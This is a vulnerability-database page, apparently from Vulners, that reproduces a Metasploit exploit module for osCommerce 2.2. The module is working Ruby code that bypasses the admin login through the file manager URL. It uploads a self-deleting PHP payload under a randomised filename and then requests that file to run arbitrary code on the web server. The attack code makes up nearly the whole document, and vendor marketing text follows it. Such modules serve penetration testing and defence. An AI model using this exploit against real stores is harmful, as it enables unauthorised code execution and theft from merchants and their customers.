Vulners
Lucene search
osCommerce 2.2 Arbitrary PHP Code Execution
##
# $Id: oscommerce_filemanager.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'osCommerce 2.2 Arbitrary PHP Code Execution',
'Description' => %q{
osCommerce is a popular open source E-Commerce application.
The admin console contains a file management utility that
allows administrators to upload, download, and edit files.
This could be abused to allow unauthenticated attackers to
execute arbitrary code with the permissions of the
webserver.
},
'Author' => [ 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'OSVDB', '60018' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9556' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'Space' => 4000,
# max url length for some old versions of apache according to
# http://www.boutell.com/newfaq/misc/urllength.html
'DisableNops' => true,
#'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'ConnectionType' => 'find',
},
# Since our payload is uploaded as a file, it is polite to
# clean up after ourselves.
'Prepend' => "unlink(__FILE__);",
'Keys' => ['php'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2009'
))
register_options(
[
OptString.new('URI', [ true, "Base osCommerce directory path", '/catalog/']),
], self.class)
end
def exploit
# Our filename gets run through basename(), so we can have arbitrary
# junk in front of slashes and it will get stripped out. The unlink in
# Payload => Prepend above ensures that the file is deleted.
filename = rand_text_alphanumeric(rand(5)+5) + "/"
(rand(5)+5).times do
filename << rand_text_alphanumeric(rand(5)+5) + "/"
end
filename << rand_text_alphanumeric(rand(5)+5) + ".php"
p = rand_text_english(rand(100)+100) + "<?php " + payload.encoded + " ?>" + rand_text_english(rand(100)+100)
p = Rex::Text.uri_encode(p)
data = "filename=#{filename}&file_contents=#{p}"
print_status("Sending file save request")
response = send_request_raw({
'uri' => datastore['URI'] + "admin/file_manager.php/login.php?action=save",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => data.length,
}
}, 3)
# If the upload worked, the server tries to redirect us to some info
# about the file we just saved
if response and response.code != 302
print_error("Server returned non-302 status code (#{response.code})")
end
print_status("Requesting our payload")
# very short timeout because the request may never return if we're
# sending a socket payload
timeout = 0.1
response = send_request_raw({
# Allow findsock payloads to work
'global' => true,
'uri' => datastore['URI'] + File.basename(filename)
}, timeout)
handler
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1